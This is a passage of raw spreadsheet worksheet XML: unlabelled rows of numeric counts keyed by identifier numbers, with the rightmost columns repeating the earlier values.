        <v>59</v>
      </c>
      <c r="K57" s="7">
        <v>175</v>
      </c>
      <c r="L57" s="8">
        <v>0</v>
      </c>
      <c r="M57" s="8">
        <v>0</v>
      </c>
      <c r="N57" s="8">
        <v>30</v>
      </c>
      <c r="O57" s="8">
        <v>22</v>
      </c>
      <c r="P57" s="8">
        <v>4</v>
      </c>
      <c r="Q57" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="58" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A58" s="7">
        <v>177</v>
      </c>
      <c r="B58" s="8">
        <v>0</v>
      </c>
      <c r="C58" s="8">
        <v>0</v>
      </c>
      <c r="D58" s="8">
        <v>0</v>
      </c>
      <c r="E58" s="8">
        <v>0</v>
      </c>
      <c r="F58" s="8">
        <v>4</v>
      </c>
      <c r="G58" s="8">
        <v>0</v>
      </c>
      <c r="H58" s="8">
        <v>4</v>
      </c>
      <c r="K58" s="7">
        <v>177</v>
      </c>
      <c r="L58" s="8">
        <v>0</v>
      </c>
      <c r="M58" s="8">
        <v>0</v>
      </c>
      <c r="N58" s="8">
        <v>0</v>
      </c>
      <c r="O58" s="8">
        <v>0</v>
      </c>
      <c r="P58" s="8">
        <v>4</v>
      </c>
      <c r="Q58" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A59" s="7">
        <v>181</v>
      </c>
      <c r="B59" s="8">
        <v>24</v>
      </c>
      <c r="C59" s="8">
        <v>0</v>
      </c>
      <c r="D59" s="8">
        <v>0</v>
      </c>
      <c r="E59" s="8">
        <v>0</v>
      </c>
      <c r="F59" s="8">
        <v>23</v>
      </c>
      <c r="G59" s="8">
        <v>39</v>
      </c>
      <c r="H59" s="8">
        <v>86</v>
      </c>
      <c r="K59" s="7">
        <v>181</v>
      </c>
      <c r="L59" s="8">
        <v>24</v>
      </c>
      <c r="M59" s="8">
        <v>0</v>
      </c>
      <c r="N59" s="8">
        <v>0</v>
      </c>
      <c r="O59" s="8">
        <v>0</v>
      </c>
      <c r="P59" s="8">
        <v>23</v>
      </c>
      <c r="Q59" s="8">
        <v>39</v>
      </c>
    </row>
    <row r="60" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A60" s="7">
        <v>186</v>
      </c>
      <c r="B60" s="8">
        <v>25</v>
      </c>
      <c r="C60" s="8">
        <v>0</v>
      </c>
      <c r="D60" s="8">
        <v>10</v>
      </c>
      <c r="E60" s="8">
        <v>7</v>
      </c>
      <c r="F60" s="8">
        <v>85</v>
      </c>
      <c r="G60" s="8">
        <v>48</v>
      </c>
      <c r="H60" s="8">
        <v>175</v>
      </c>
      <c r="K60" s="7">
        <v>186</v>
      </c>
      <c r="L60" s="8">
        <v>25</v>
      </c>
      <c r="M60" s="8">
        <v>0</v>
      </c>
      <c r="N60" s="8">
        <v>10</v>
      </c>
      <c r="O60" s="8">
        <v>7</v>
      </c>
      <c r="P60" s="8">
        <v>85</v>
      </c>
      <c r="Q60" s="8">
        <v>48</v>
      </c>
    </row>
    <row r="61" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A61" s="7">
        <v>195</v>
      </c>
      <c r="B61" s="8">
        <v>7</v>
      </c>
      <c r="C61" s="8">
        <v>0</v>
      </c>
      <c r="D61" s="8">
        <v>0</v>
      </c>
      <c r="E61" s="8">
        <v>0</v>
      </c>
      <c r="F61" s="8">
        <v>13</v>
      </c>
      <c r="G61" s="8">
        <v>1</v>
      </c>
      <c r="H61" s="8">
        <v>21</v>
      </c>
      <c r="K61" s="7">
        <v>195</v>
      </c>
      <c r="L61" s="8">
        <v>7</v>
      </c>
      <c r="M61" s="8">
        <v>0</v>
      </c>
      <c r="N61" s="8">
        <v>0</v>
      </c>
      <c r="O61" s="8">
        <v>0</v>
      </c>
      <c r="P61" s="8">
        <v>13</v>
      </c>
      <c r="Q61" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A62" s="7">
        <v>197</v>
      </c>
      <c r="B62" s="8">
        <v>26</v>
      </c>
      <c r="C62" s="8">
        <v>0</v>
      </c>
      <c r="D62" s="8">
        <v>6</v>
      </c>
      <c r="E62" s="8">
        <v>2</v>
      </c>
      <c r="F62" s="8">
        <v>11</v>
      </c>
      <c r="G62" s="8">
        <v>3</v>
      </c>
      <c r="H62" s="8">
        <v>48</v>
      </c>
      <c r="K62" s="7">
        <v>197</v>
      </c>
      <c r="L62" s="8">
        <v>26</v>
      </c>
      <c r="M62" s="8">
        <v>0</v>
      </c>
      <c r="N62" s="8">
        <v>6</v>
      </c>
      <c r="O62" s="8">
        <v>2</v>
      </c>
      <c r="P62" s="8">
        <v>11</v>
      </c>
      <c r="Q62" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="63" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A63" s="7">
        <v>204</v>
      </c>
      <c r="B63" s="8">
        <v>25</v>
      </c>
      <c r="C63" s="8">
        <v>1</v>
      </c>
      <c r="D63" s="8">
        <v>12</v>
      </c>
      <c r="E63" s="8">
        <v>48</v>
      </c>
      <c r="F63" s="8">
        <v>4</v>
      </c>
      <c r="G63" s="8">
        <v>2</v>
      </c>
      <c r="H63" s="8">
        <v>92</v>
      </c>
      <c r="K63" s="7">
        <v>204</v>
      </c>
      <c r="L63" s="8">
        <v>25</v>
      </c>
      <c r="M63" s="8">
        <v>1</v>
      </c>
      <c r="N63" s="8">
        <v>12</v>
      </c>
      <c r="O63" s="8">
        <v>48</v>
      </c>
      <c r="P63" s="8">
        <v>4</v>
      </c>
      <c r="Q63" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="64" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A64" s="7">
        <v>206</v>
      </c>
      <c r="B64" s="8">
        <v>25</v>
      </c>
      <c r="C64" s="8">
        <v>2</v>
      </c>
      <c r="D64" s="8">
        <v>36</v>
      </c>
      <c r="E64" s="8">
        <v>22</v>
      </c>
      <c r="F64" s="8">
        <v>12</v>
      </c>
      <c r="G64" s="8">
        <v>9</v>
      </c>
      <c r="H64" s="8">
        <v>106</v>
      </c>
      <c r="K64" s="7">
        <v>206</v>
      </c>
      <c r="L64" s="8">
        <v>25</v>
      </c>
      <c r="M64" s="8">
        <v>2</v>
      </c>
      <c r="N64" s="8">
        <v>36</v>
      </c>
      <c r="O64" s="8">
        <v>22</v>
      </c>
      <c r="P64" s="8">
        <v>12</v>
      </c>
      <c r="Q64" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="65" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A65" s="7">
        <v>210</v>
      </c>
      <c r="B65" s="8">
        <v>26</v>
      </c>
      <c r="C65" s="8">
        <v>2</v>
      </c>
      <c r="D65" s="8">
        <v>58</v>
      </c>
      <c r="E65" s="8">
        <v>6</v>
      </c>
      <c r="F65" s="8">
        <v>14</v>
      </c>
      <c r="G65" s="8">
        <v>4</v>
      </c>
      <c r="H65" s="8">
        <v>110</v>
      </c>
      <c r="K65" s="7">
        <v>210</v>
      </c>
      <c r="L65" s="8">
        <v>26</v>
      </c>
      <c r="M65" s="8">
        <v>2</v>
      </c>
      <c r="N65" s="8">
        <v>58</v>
      </c>
      <c r="O65" s="8">
        <v>6</v>
      </c>
      <c r="P65" s="8">
        <v>14</v>
      </c>
      <c r="Q65" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="66" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A66" s="7">
        <v>212</v>
      </c>
      <c r="B66" s="8">
        <v>0</v>
      </c>
      <c r="C66" s="8">
        <v>0</v>
      </c>
      <c r="D66" s="8">
        <v>5</v>
      </c>
      <c r="E66" s="8">
        <v>35</v>
      </c>
      <c r="F66" s="8">
        <v>2</v>
      </c>
      <c r="G66" s="8">
        <v>0</v>
      </c>
      <c r="H66" s="8">
        <v>42</v>
      </c>
      <c r="K66" s="7">
        <v>212</v>
      </c>
      <c r="L66" s="8">
        <v>0</v>
      </c>
      <c r="M66" s="8">
        <v>0</v>
      </c>
      <c r="N66" s="8">
        <v>5</v>
      </c>
      <c r="O66" s="8">
        <v>35</v>
      </c>
      <c r="P66" s="8">
        <v>2</v>
      </c>
      <c r="Q66" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A67" s="7">
        <v>213</v>
      </c>
      <c r="B67" s="8">
        <v>25</v>
      </c>
      <c r="C67" s="8">
        <v>1</v>
      </c>
      <c r="D67" s="8">
        <v>0</v>
      </c>
      <c r="E67" s="8">
        <v>0</v>
      </c>
      <c r="F67" s="8">
        <v>109</v>
      </c>
      <c r="G67" s="8">
        <v>5</v>
      </c>
      <c r="H67" s="8">
        <v>140</v>
      </c>
      <c r="K67" s="7">
        <v>213</v>
      </c>
      <c r="L67" s="8">
        <v>25</v>
      </c>
      <c r="M67" s="8">
        <v>1</v>
      </c>
      <c r="N67" s="8">
        <v>0</v>
      </c>
      <c r="O67" s="8">
        <v>0</v>
      </c>
      <c r="P67" s="8">
        <v>109</v>
      </c>
      <c r="Q67" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="68" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A68" s="7">
        <v>215</v>
      </c>
      <c r="B68" s="8">
        <v>12</v>
      </c>
      <c r="C68" s="8">
        <v>2</v>
      </c>
      <c r="D68" s="8">
        <v>2</v>
      </c>
      <c r="E68" s="8">
        <v>0</v>
      </c>
      <c r="F68" s="8">
        <v>9</v>
      </c>
      <c r="G68" s="8">
        <v>1</v>
      </c>
      <c r="H68" s="8">
        <v>26</v>
      </c>
      <c r="K68" s="7">
        <v>215</v>
      </c>
      <c r="L68" s="8">
        <v>12</v>
      </c>
      <c r="M68" s="8">
        <v>2</v>
      </c>
      <c r="N68" s="8">
        <v>2</v>
      </c>
      <c r="O68" s="8">
        <v>0</v>
      </c>
      <c r="P68" s="8">
        <v>9</v>
      </c>
      <c r="Q68" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A69" s="7">
        <v>217</v>
      </c>
      <c r="B69" s="8">
        <v>6</v>
      </c>
      <c r="C69" s="8">
        <v>1</v>
      </c>
      <c r="D69" s="8">
        <v>6</v>
      </c>
      <c r="E69" s="8">
        <v>0</v>
      </c>
      <c r="F69" s="8">
        <v>1</v>
      </c>
      <c r="G69" s="8">
        <v>8</v>
      </c>
      <c r="H69" s="8">
        <v>22</v>
      </c>
      <c r="K69" s="7">
        <v>217</v>
      </c>
      <c r="L69" s="8">
        <v>6</v>
      </c>
      <c r="M69" s="8">
        <v>1</v>
      </c>
      <c r="N69" s="8">
        <v>6</v>
      </c>
      <c r="O69" s="8">
        <v>0</v>
      </c>
      <c r="P69" s="8">
        <v>1</v>
      </c>
      <c r="Q69" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="70" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A70" s="7">
        <v>219</v>
      </c>
      <c r="B70" s="8">
        <v>25</v>
      </c>
      <c r="C70" s="8">
        <v>1</v>
      </c>
      <c r="D70" s="8">
        <v>16</v>
      </c>
      <c r="E70" s="8">
        <v>117</v>
      </c>
      <c r="F70" s="8">
        <v>10</v>
      </c>
      <c r="G70" s="8">
        <v>18</v>
      </c>
      <c r="H70" s="8">
        <v>187</v>
      </c>
      <c r="K70" s="7">
        <v>219</v>
      </c>
      <c r="L70" s="8">
        <v>25</v>
      </c>
      <c r="M70" s="8">
        <v>1</v>
      </c>
      <c r="N70" s="8">
        <v>16</v>
      </c>
      <c r="O70" s="8">
        <v>117</v>
      </c>
      <c r="P70" s="8">
        <v>10</v>
      </c>
      <c r="Q70" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="71" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A71" s="7">
        <v>226</v>
      </c>
      <c r="B71" s="8">
        <v>26</v>
      </c>
      <c r="C71" s="8">
        <v>1</v>
      </c>
      <c r="D71" s="8">
        <v>38</v>
      </c>
      <c r="E71" s="8">
        <v>40</v>
      </c>
      <c r="F71" s="8">
        <v>57</v>
      </c>
      <c r="G71" s="8">
        <v>36</v>
      </c>
      <c r="H71" s="8">
        <v>198</v>
      </c>
      <c r="K71" s="7">
        <v>226</v>
      </c>
      <c r="L71" s="8">
        <v>26</v>
      </c>
      <c r="M71" s="8">
        <v>1</v>
      </c>
      <c r="N71" s="8">
        <v>38</v>
      </c>
      <c r="O71" s="8">
        <v>40</v>
      </c>
      <c r="P71" s="8">
        <v>57</v>
      </c>
      <c r="Q71" s="8">
        <v>36</v>
      </c>
    </row>
    <row r="72" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A72" s="7">
        <v>227</v>
      </c>
      <c r="B72" s="8">
        <v>26</v>
      </c>
      <c r="C72" s="8">
        <v>1</v>
      </c>
      <c r="D72" s="8">
        <v>0</v>
      </c>
      <c r="E72" s="8">
        <v>60</v>
      </c>
      <c r="F72" s="8">
        <v>259</v>
      </c>
      <c r="G72" s="8">
        <v>385</v>
      </c>
      <c r="H72" s="8">
        <v>731</v>
      </c>
      <c r="K72" s="7">
        <v>227</v>
      </c>
      <c r="L72" s="8">
        <v>26</v>
      </c>
      <c r="M72" s="8">
        <v>1</v>
      </c>
      <c r="N72" s="8">
        <v>0</v>
      </c>
      <c r="O72" s="8">
        <v>60</v>
      </c>
      <c r="P72" s="8">
        <v>259</v>
      </c>
      <c r="Q72" s="8">
        <v>385</v>
      </c>
    </row>
    <row r="73" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A73" s="7">
        <v>228</v>
      </c>
      <c r="B73" s="8">
        <v>0</v>
      </c>
      <c r="C73" s="8">
        <v>0</v>
      </c>
      <c r="D73" s="8">
        <v>10</v>
      </c>
      <c r="E73" s="8">
        <v>0</v>
      </c>
      <c r="F73" s="8">
        <v>3</v>
      </c>
      <c r="G73" s="8">
        <v>2</v>
      </c>
      <c r="H73" s="8">
        <v>15</v>
      </c>
      <c r="K73" s="7">
        <v>228</v>
      </c>
      <c r="L73" s="8">
        <v>0</v>
      </c>
      <c r="M73" s="8">
        <v>0</v>
      </c>
      <c r="N73" s="8">
        <v>10</v>
      </c>
      <c r="O73" s="8">
        <v>0</v>
      </c>
      <c r="P73" s="8">
        <v>3</v>
      </c>
      <c r="Q73" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="74" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A74" s="7">
        <v>229</v>
      </c>
      <c r="B74" s="8">
        <v>25</v>
      </c>
      <c r="C74" s="8">
        <v>1</v>
      </c>
      <c r="D74" s="8">
        <v>18</v>
      </c>
      <c r="E74" s="8">
        <v>25</v>
      </c>
      <c r="F74" s="8">
        <v>4</v>
      </c>
      <c r="G74" s="8">
        <v>4</v>
      </c>
      <c r="H74" s="8">
        <v>77</v>
      </c>
      <c r="K74" s="7">
        <v>229</v>
      </c>
      <c r="L74" s="8">
        <v>25</v>
      </c>
      <c r="M74" s="8">
        <v>1</v>
      </c>
      <c r="N74" s="8">
        <v>18</v>
      </c>
      <c r="O74" s="8">
        <v>25</v>
      </c>
      <c r="P74" s="8">
        <v>4</v>
      </c>
      <c r="Q74" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="75" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A75" s="7">
        <v>231</v>
      </c>
      <c r="B75" s="8">
        <v>20</v>
      </c>
      <c r="C75" s="8">
        <v>1</v>
      </c>
      <c r="D75" s="8">
        <v>103</v>
      </c>
      <c r="E75" s="8">
        <v>414</v>
      </c>
      <c r="F75" s="8">
        <v>12</v>
      </c>
      <c r="G75" s="8">
        <v>13</v>
      </c>
      <c r="H75" s="8">
        <v>563</v>
      </c>
      <c r="K75" s="7">
        <v>231</v>
      </c>
      <c r="L75" s="8">
        <v>20</v>
      </c>
      <c r="M75" s="8">
        <v>1</v>
      </c>
      <c r="N75" s="8">
        <v>103</v>
      </c>
      <c r="O75" s="8">
        <v>414</v>
      </c>
      <c r="P75" s="8">
        <v>12</v>
      </c>
      <c r="Q75" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="76" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A76" s="7">
        <v>233</v>
      </c>
      <c r="B76" s="8">
        <v>6</v>
      </c>
      <c r="C76" s="8">
        <v>1</v>
      </c>
      <c r="D76" s="8">
        <v>72</v>
      </c>
      <c r="E76" s="8">
        <v>66</v>
      </c>
      <c r="F76" s="8">
        <v>18</v>
      </c>
      <c r="G76" s="8">
        <v>12</v>
      </c>
      <c r="H76" s="8">
        <v>175</v>
      </c>
      <c r="K76" s="7">
        <v>233</v>
      </c>
      <c r="L76" s="8">
        <v>6</v>
      </c>
      <c r="M76" s="8">
        <v>1</v>
      </c>
      <c r="N76" s="8">
        <v>72</v>
      </c>
      <c r="O76" s="8">
        <v>66</v>
      </c>
      <c r="P76" s="8">
        <v>18</v>
      </c>
      <c r="Q76" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="77" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A77" s="7">
        <v>235</v>
      </c>
      <c r="B77" s="8">
        <v>6</v>
      </c>
      <c r="C77" s="8">
        <v>1</v>
      </c>
      <c r="D77" s="8">
        <v>116</v>
      </c>
      <c r="E77" s="8">
        <v>307</v>
      </c>
      <c r="F77" s="8">
        <v>13</v>
      </c>
      <c r="G77" s="8">
        <v>4</v>
      </c>
      <c r="H77" s="8">
        <v>447</v>
      </c>
      <c r="K77" s="7">
        <v>235</v>
      </c>
      <c r="L77" s="8">
        <v>6</v>
      </c>
      <c r="M77" s="8">
        <v>1</v>
      </c>
      <c r="N77" s="8">
        <v>116</v>
      </c>
      <c r="O77" s="8">
        <v>307</v>
      </c>
      <c r="P77" s="8">
        <v>13</v>
      </c>
      <c r="Q77" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="78" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A78" s="7">
        <v>236</v>
      </c>
      <c r="B78" s="8">
        <v>26</v>
      </c>
      <c r="C78" s="8">
        <v>1</v>
      </c>
      <c r="D78" s="8">
        <v>25</v>
      </c>
      <c r="E78" s="8">
        <v>45</v>
      </c>
      <c r="F78" s="8">
        <v>18</v>
      </c>
      <c r="G78" s="8">
        <v>25</v>
      </c>
      <c r="H78" s="8">
        <v>140</v>
      </c>
      <c r="K78" s="7">
        <v>236</v>
      </c>
      <c r="L78" s="8">
        <v>26</v>
      </c>
      <c r="M78" s="8">
        <v>1</v>
      </c>
      <c r="N78" s="8">
        <v>25</v>
      </c>
      <c r="O78" s="8">
        <v>45</v>
      </c>
      <c r="P78" s="8">
        <v>18</v>
      </c>
      <c r="Q78" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="79" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A79" s="7">
        <v>237</v>
      </c>
      <c r="B79" s="8">
        <v>26</v>
      </c>
      <c r="C79" s="8">
        <v>0</v>
      </c>
      <c r="D79" s="8">
        <v>75</v>
      </c>
      <c r="E79" s="8">
        <v>85</v>
      </c>
      <c r="F79" s="8">
        <v>8</v>
      </c>
      <c r="G79" s="8">
        <v>16</v>
      </c>
      <c r="H79" s="8">
        <v>210</v>
      </c>
      <c r="K79" s="7">
        <v>237</v>
      </c>
      <c r="L79" s="8">
        <v>26</v>
      </c>
      <c r="M79" s="8">
        <v>0</v>
      </c>
      <c r="N79" s="8">
        <v>75</v>
      </c>
      <c r="O79" s="8">
        <v>85</v>
      </c>
      <c r="P79" s="8">
        <v>8</v>
      </c>
      <c r="Q79" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="80" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A80" s="7">
        <v>241</v>
      </c>
      <c r="B80" s="8">
        <v>26</v>
      </c>
      <c r="C80" s="8">
        <v>1</v>
      </c>
      <c r="D80" s="8">
        <v>50</v>
      </c>
      <c r="E80" s="8">
        <v>75</v>
      </c>
      <c r="F80" s="8">
        <v>16</v>
      </c>
      <c r="G80" s="8">
        <v>24</v>
      </c>
      <c r="H80" s="8">
        <v>192</v>
      </c>
      <c r="K80" s="7">
        <v>241</v>
      </c>
      <c r="L80" s="8">
        <v>26</v>
      </c>
      <c r="M80" s="8">
        <v>1</v>
      </c>
      <c r="N80" s="8">
        <v>50</v>
      </c>
      <c r="O80" s="8">
        <v>75</v>
      </c>
      <c r="P80" s="8">
        <v>16</v>
      </c>
      <c r="Q80" s="8">
        <v>24</v>
      </c>
    </row>
    <row r="81" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A81" s="7">
        <v>242</v>
      </c>
      <c r="B81" s="8">
        <v>25</v>
      </c>
      <c r="C81" s="8">
        <v>1</v>
      </c>
      <c r="D81" s="8">
        <v>25</v>
      </c>
      <c r="E81" s="8">
        <v>20</v>
      </c>
      <c r="F81" s="8">
        <v>30</v>
      </c>
      <c r="G81" s="8">
        <v>18</v>
      </c>
      <c r="H81" s="8">
        <v>119</v>
      </c>
      <c r="K81" s="7">
        <v>242</v>
      </c>
      <c r="L81" s="8">
        <v>25</v>
      </c>
      <c r="M81" s="8">
        <v>1</v>
      </c>
      <c r="N81" s="8">
        <v>25</v>
      </c>
      <c r="O81" s="8">
        <v>20</v>
      </c>
      <c r="P81" s="8">
        <v>30</v>
      </c>
      <c r="Q81" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="82" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A82" s="7">
        <v>244</v>
      </c>
      <c r="B82" s="8">
        <v>25</v>
      </c>
      <c r="C82" s="8">
        <v>0</v>
      </c>
      <c r="D82" s="8">
        <v>10</v>
      </c>
      <c r="E82" s="8">
        <v>40</v>
      </c>
      <c r="F82" s="8">
        <v>6</v>
      </c>
      <c r="G82" s="8">
        <v>5</v>
      </c>
      <c r="H82" s="8">
        <v>86</v>
      </c>
      <c r="K82" s="7">
        <v>244</v>
      </c>
      <c r="L82" s="8">
        <v>25</v>
      </c>
      <c r="M82" s="8">
        <v>0</v>
      </c>
      <c r="N82" s="8">
        <v>10</v>
      </c>
      <c r="O82" s="8">
        <v>40</v>
      </c>
      <c r="P82" s="8">
        <v>6</v>
      </c>
      <c r="Q82" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="83" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A83" s="7">
        <v>248</v>
      </c>
      <c r="B83" s="8">
        <v>1</v>
      </c>
      <c r="C83" s="8">
        <v>1</v>
      </c>
      <c r="D83" s="8">
        <v>15</v>
      </c>
      <c r="E83" s="8">
        <v>190</v>
      </c>
      <c r="F83" s="8">
        <v>8</v>
      </c>
      <c r="G83" s="8">
        <v>11</v>
      </c>
      <c r="H83" s="8">
        <v>226</v>
      </c>
      <c r="K83" s="7">
        <v>248</v>
      </c>
      <c r="L83" s="8">
        <v>1</v>
      </c>
      <c r="M83" s="8">
        <v>1</v>
      </c>
      <c r="N83" s="8">
        <v>15</v>
      </c>
      <c r="O83" s="8">
        <v>190</v>
      </c>
      <c r="P83" s="8">
        <v>8</v>
      </c>
      <c r="Q83" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="84" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A84" s="7">
        <v>253</v>
      </c>
      <c r="B84" s="8">
        <v>24</v>
      </c>
      <c r="C84" s="8">
        <v>1</v>
      </c>
      <c r="D84" s="8">
        <v>111</v>
      </c>
      <c r="E84" s="8">
        <v>171</v>
      </c>
      <c r="F84" s="8">
        <v>34</v>
      </c>
      <c r="G84" s="8">
        <v>51</v>
      </c>
      <c r="H84" s="8">
        <v>392</v>
      </c>
      <c r="K84" s="7">
        <v>253</v>
      </c>
      <c r="L84" s="8">
        <v>24</v>
      </c>
      <c r="M84" s="8">
        <v>1</v>
      </c>
      <c r="N84" s="8">
        <v>111</v>
      </c>
      <c r="O84" s="8">
        <v>171</v>
      </c>
      <c r="P84" s="8">
        <v>34</v>
      </c>
      <c r="Q84" s="8">
        <v>51</v>
      </c>
    </row>
    <row r="85" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A85" s="7">
        <v>256</v>
      </c>
      <c r="B85" s="8">
        <v>0</v>
      </c>
      <c r="C85" s="8">
        <v>0</v>
      </c>
      <c r="D85" s="8">
        <v>10</v>
      </c>
      <c r="E85" s="8">
        <v>50</v>
      </c>
      <c r="F85" s="8">
        <v>2</v>
      </c>
      <c r="G85" s="8">
        <v>8</v>
      </c>
      <c r="H85" s="8">
        <v>70</v>
      </c>
      <c r="K85" s="7">
        <v>256</v>
      </c>
      <c r="L85" s="8">
        <v>0</v>
      </c>
      <c r="M85" s="8">
        <v>0</v>
      </c>
      <c r="N85" s="8">
        <v>10</v>
      </c>
      <c r="O85" s="8">
        <v>50</v>
      </c>
      <c r="P85" s="8">
        <v>2</v>
      </c>
      <c r="Q85" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="86" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A86" s="7">
        <v>258</v>
      </c>
      <c r="B86" s="8">
        <v>25</v>
      </c>
      <c r="C86" s="8">
        <v>1</v>
      </c>
      <c r="D86" s="8">
        <v>5</v>
      </c>
      <c r="E86" s="8">
        <v>4</v>
      </c>
      <c r="F86" s="8">
        <v>6</v>
      </c>
      <c r="G86" s="8">
        <v>7</v>
      </c>
      <c r="H86" s="8">
        <v>48</v>
      </c>
      <c r="K86" s="7">
        <v>258</v>
      </c>
      <c r="L86" s="8">
        <v>25</v>
      </c>
      <c r="M86" s="8">
        <v>1</v>
      </c>
      <c r="N86" s="8">
        <v>5</v>
      </c>
      <c r="O86" s="8">
        <v>4</v>
      </c>
      <c r="P86" s="8">
        <v>6</v>
      </c>
      <c r="Q86" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="87" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A87" s="7">
        <v>259</v>
      </c>
      <c r="B87" s="8">
        <v>25</v>
      </c>
      <c r="C87" s="8">
        <v>1</v>
      </c>
      <c r="D87" s="8">
        <v>11</v>
      </c>
      <c r="E87" s="8">
        <v>33</v>
      </c>
      <c r="F87" s="8">
        <v>40</v>
      </c>
      <c r="G87" s="8">
        <v>16</v>
      </c>
      <c r="H87" s="8">
        <v>126</v>
      </c>
      <c r="K87" s="7">
        <v>259</v>
      </c>
      <c r="L87" s="8">
        <v>25</v>
      </c>
      <c r="M87" s="8">
        <v>1</v>
      </c>
      <c r="N87" s="8">
        <v>11</v>
      </c>
      <c r="O87" s="8">
        <v>33</v>
      </c>
      <c r="P87" s="8">
        <v>40</v>
      </c>
      <c r="Q87" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="88" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A88" s="7">
        <v>269</v>
      </c>
      <c r="B88" s="8">
        <v>24</v>
      </c>
      <c r="C88" s="8">
        <v>2</v>
      </c>
      <c r="D88" s="8">
        <v>226</v>
      </c>
      <c r="E88" s="8">
        <v>404</v>
      </c>
      <c r="F88" s="8">
        <v>186</v>
      </c>
      <c r="G88" s="8">
        <v>98</v>
      </c>
      <c r="H88" s="8">
        <v>940</v>
      </c>
      <c r="K88" s="7">
        <v>269</v>
      </c>
      <c r="L88" s="8">
        <v>24</v>
      </c>
      <c r="M88" s="8">
        <v>2</v>
      </c>
      <c r="N88" s="8">
        <v>226</v>
      </c>
      <c r="O88" s="8">
        <v>404</v>
      </c>
      <c r="P88" s="8">
        <v>186</v>
      </c>
      <c r="Q88" s="8">
        <v>98</v>
      </c>
    </row>
    <row r="89" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A89" s="7">
        <v>272</v>
      </c>
      <c r="B89" s="8">
        <v>45</v>
      </c>
      <c r="C89" s="8">
        <v>2</v>
      </c>
      <c r="D89" s="8">
        <v>349</v>
      </c>
      <c r="E89" s="8">
        <v>502</v>
      </c>
      <c r="F89" s="8">
        <v>1532</v>
      </c>
      <c r="G89" s="8">
        <v>3010</v>
      </c>
      <c r="H89" s="8">
        <v>5440</v>
      </c>
      <c r="K89" s="7">
        <v>272</v>
      </c>
      <c r="L89" s="8">
        <v>45</v>
      </c>
      <c r="M89" s="8">
        <v>2</v>
      </c>
      <c r="N89" s="8">
        <v>349</v>
      </c>
      <c r="O89" s="8">
        <v>502</v>
      </c>
      <c r="P89" s="8">
        <v>1532</v>
      </c>
      <c r="Q89" s="8">
        <v>3010</v>
      </c>
    </row>
    <row r="90" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A90" s="7">
        <v>274</v>
      </c>
      <c r="B90" s="8">
        <v>5</v>
      </c>
      <c r="C90" s="8">
        <v>0</v>
      </c>
      <c r="D90" s="8">
        <v>33</v>
      </c>
      <c r="E90" s="8">
        <v>210</v>
      </c>
      <c r="F90" s="8">
        <v>30</v>
      </c>
      <c r="G90" s="8">
        <v>18</v>
      </c>
      <c r="H90" s="8">
        <v>296</v>
      </c>
      <c r="K90" s="7">
        <v>274</v>
      </c>
      <c r="L90" s="8">
        <v>5</v>
      </c>
      <c r="M90" s="8">
        <v>0</v>
      </c>
      <c r="N90" s="8">
        <v>33</v>
      </c>
      <c r="O90" s="8">
        <v>210</v>
      </c>
      <c r="P90" s="8">
        <v>30</v>
      </c>
      <c r="Q90" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="91" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A91" s="7">
        <v>276</v>
      </c>
      <c r="B91" s="8">
        <v>22</v>
      </c>
      <c r="C91" s="8">
        <v>1</v>
      </c>
      <c r="D91" s="8">
        <v>0</v>
      </c>
      <c r="E91" s="8">
        <v>1</v>
      </c>
      <c r="F91" s="8">
        <v>36</v>
      </c>
      <c r="G91" s="8">
        <v>31</v>
      </c>
      <c r="H91" s="8">
